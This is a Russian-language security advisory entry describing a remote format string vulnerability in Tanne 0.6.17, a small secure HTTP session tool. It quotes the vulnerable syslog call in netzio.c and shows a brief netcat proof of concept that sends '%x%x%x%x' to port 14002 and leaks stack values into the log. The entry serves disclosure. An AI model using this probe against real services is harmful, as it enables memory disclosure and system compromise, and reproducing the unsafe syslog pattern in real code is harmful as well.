Дата публикации: | 09.01.2003 |
Всего просмотров: | 1077 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | tanne 0.x |
Описание: | Tanne (http://tanne.fluxnetz.de/) – небольшое решение для создания безопасных HTTP сессий.
Уязвимость форматной строки присутствует в следующем фрагменте кода в 'netzio.c':
59 else 60 { 61 va_start( args, str ); 62 vsnprintf( txt, 511, str, args ); 63 va_end( args ); 64 openlog( "Tanne2", LOG_PID, LOG_DAEMON ); 65 syslog( LOG_INFO, txt ); // Here. 66 closelog(); 67 } 68 umask( NORMALE_UMASK ); 69 #else 70 va_start( args, str ); 71 vsnprintf( txt, 511, str, args ); 72 va_end( args ); 73 openlog( "Tanne2", LOG_PID, LOG_DAEMON ); 74 syslog( LOG_INFO, txt ); // Here. 75 closelog(); 76 #endif 77 }Пример bash# netstat -an | grep 14002 tcp 0 0 127.0.0.1:14002 0.0.0.0:* LISTEN bash# nc 0 14002 %x%x%x%x |F| bash# tail -1 /var/log/messages Jan 5 11:29:55 xpl017elz Tanne2[3540]: FATAL: ID (804bbc0118bffff980) nicht gefunden bash#Уязвимость обнаружена в tanne 0.6.17 |
Ссылки: | [INetCop Security Advisory] Remote format string vulnerability in Tanne. |